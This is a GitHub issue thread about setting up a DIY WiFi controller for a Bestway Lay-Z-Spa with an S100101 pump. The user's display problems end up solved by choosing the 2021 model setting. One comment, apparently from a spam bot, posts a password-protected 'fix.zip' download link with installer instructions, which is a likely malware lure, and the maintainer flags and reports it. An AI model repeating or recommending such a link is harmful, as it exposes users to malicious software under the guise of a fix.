visualapproach/WiFi-remote-for-Bestway-Lay-Z-SPA #793: [OTHER]

jordanderoubaix, 2024-08-26:
**Hardware :**
 - Pump model, S100101
 - 6 wires
 - PCB_V2B
 - Level shifter type (red)

**Software :**
 - Version 4.4.5

**Your message**

Hello,
First, I would like to thank you for this project and all informations provided. I've searched on Github's issues without success.

I have a "Ibiza" model, the pump is S100101. I have purchased the PVC_V2B, I have done soldering (maybe not perfect, I'm not an expert in this domain), software is uploaded and everything seems to be fine --> no errors on hardware test.

How can I be sure of the model to select in the hardware config ? Between pre-2021 or 2021 ? I have tried both but I still have some issues:
- temperature unit switch from C to F indefinitely
- When clicking on heating button on the display it changes the temperature unit
- When changing temperature on web interface, it does not changes correctly on the display.
- When module is up for more than 1 hour for example, I cannot unlock, click on lock button several seconds on display does not change anything, I have to reboot (off/on) on the display

Based on what I have described, what can I do in order to diagnose what's not working correctly ? 

Thank you for your help !

[image]
[image]

2302114245, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

visualapproach, 2024-08-26:
> Download 
> 
> https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
> 
> password: changeme
> 
> In the installer menu, select "gcc."

This post looks like spam. Would you mind explaining what this is or I'll remove it

visualapproach, 2024-08-26:
Some idiot bot posts irrelevant links here. They/it have been reported.

jordanderoubaix, 2024-08-28:
Hello,

By setting DSP and pump to 2021 (and not pre-2021) it seems to work as expected now. I do not understand why it was not working the first time (because I've already tested this configuration).

I'll wait for a few days to test the lock / unlock feature and I'll add final status of this ticket here !

Thanks for your help!

closed 2024-11-05 by github-actions[bot]